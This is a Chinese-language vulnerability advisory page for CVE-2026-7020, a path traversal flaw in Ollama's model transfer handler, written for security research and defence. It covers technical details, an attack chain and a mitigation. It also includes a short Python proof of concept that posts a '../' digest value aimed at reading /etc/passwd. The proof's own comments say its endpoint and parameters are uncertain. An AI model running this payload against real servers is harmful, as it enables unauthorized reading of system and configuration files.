CVE-2026-7020 CVSS 3.7 低危

CVE-2026-7020 Ollama 路径遍历漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7020

漏洞类型

路径遍历

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ollama

漏洞概述

Ollama 0.20.2及之前版本中发现安全漏洞，影响Tensor Model Transfer Handler组件。攻击者可远程操纵`digest`参数触发路径遍历，导致敏感信息泄露。目前利用代码已公开，厂商尚未修复。

技术细节

该漏洞位于Ollama项目的`x/imagegen/transfer/transfer.go`文件中，具体涉及`digestToPath`函数的实现缺陷。此函数负责处理模型传输过程中的摘要解析，但在构建文件路径时，未能正确过滤或规范化用户输入的`digest`参数。攻击者可以精心构造包含序列“../”的恶意字符串作为digest参数值。当服务端处理该请求时，恶意字符将导致路径遍历，使得程序读取超出预期目录的文件。尽管CVSS评分显示攻击复杂度较高，但由于该组件支持远程调用且无需认证，一旦被利用，可能导致服务器上的敏感配置文件或源代码泄露。鉴于厂商目前尚未回应，该风险在未打补丁的环境中将持续存在。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络或公网，寻找开放的Ollama服务实例（默认端口11434）。

STEP 2

2. 漏洞利用

攻击者向目标Ollama服务的模型传输接口发送特制的数据包，将`digest`参数设置为包含路径遍历字符（如../）的恶意值。

STEP 3

3. 路径解析与文件读取

服务端`digestToPath`函数未正确处理该参数，将其拼接至文件路径中，导致程序读取并返回预期目录之外的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-7020: Path Traversal in Ollama
# Target: Ollama < 0.20.2
# Description: Manipulating the 'digest' argument in the transfer handler to read arbitrary files.

target_url = "http://localhost:11434/api/pull" # Example endpoint, actual endpoint may vary based on API implementation of transfer

# Malicious digest containing path traversal sequence
# Attempting to access /etc/passwd (Linux) or C:\Windows\win.ini (Windows)
malicious_digest = "../../../../../../../../etc/passwd"

payload = {
    "digest": malicious_digest,
    # Other required parameters for the transfer handler might be needed
}

try:
    response = requests.post(target_url, json=payload, timeout=10)
    if response.status_code == 200:
        print("[+] Potential successful exploitation detected.")
        print("[+] Response body:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Ollama <= 0.20.2

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议暂时通过防火墙或安全组限制对Ollama服务的访问，禁止非受信网络访问相关API端口。同时，可在应用前置网关处部署规则，清洗包含路径遍历字符的请求参数。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7020
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7020
3 Details https://www.cvedetails.com/cve/CVE-2026-7020/
4 VulDB https://vuldb.com/cve/CVE-2026-7020
5 Link https://vuldb.com/submit/797576
6 Link https://vuldb.com/vuln/359599
7 Link https://vuldb.com/vuln/359599/cti
8 Link https://vuldb.com/submit/797576

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表